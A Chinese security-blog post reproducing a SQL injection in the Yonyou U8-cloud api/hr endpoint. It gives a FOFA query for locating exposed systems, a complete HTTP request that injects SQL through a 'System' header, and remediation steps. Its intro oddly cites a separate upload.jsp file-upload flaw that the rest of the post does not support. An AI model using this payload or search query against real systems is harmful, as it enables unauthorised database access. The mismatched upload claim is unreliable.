产品简介
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞
漏洞描述
用友 U8-cloud api/hr 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
网络空间测绘
Fofa
app="用友-U8-Cloud"
漏洞复现
GET /u8cloud/api/hr HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(X11; U;Linux x86_64; zh-CN; rv:1.9.2.10)Gecko/20100922Ubuntu/10.10(maverick)Firefox/3.6.10
Cache-Control:no-cache
Connection: close
Pragma:no-cache
System:-1' or 1=(@@version)--+-
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】用友 U8-cloud api_hr sql注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论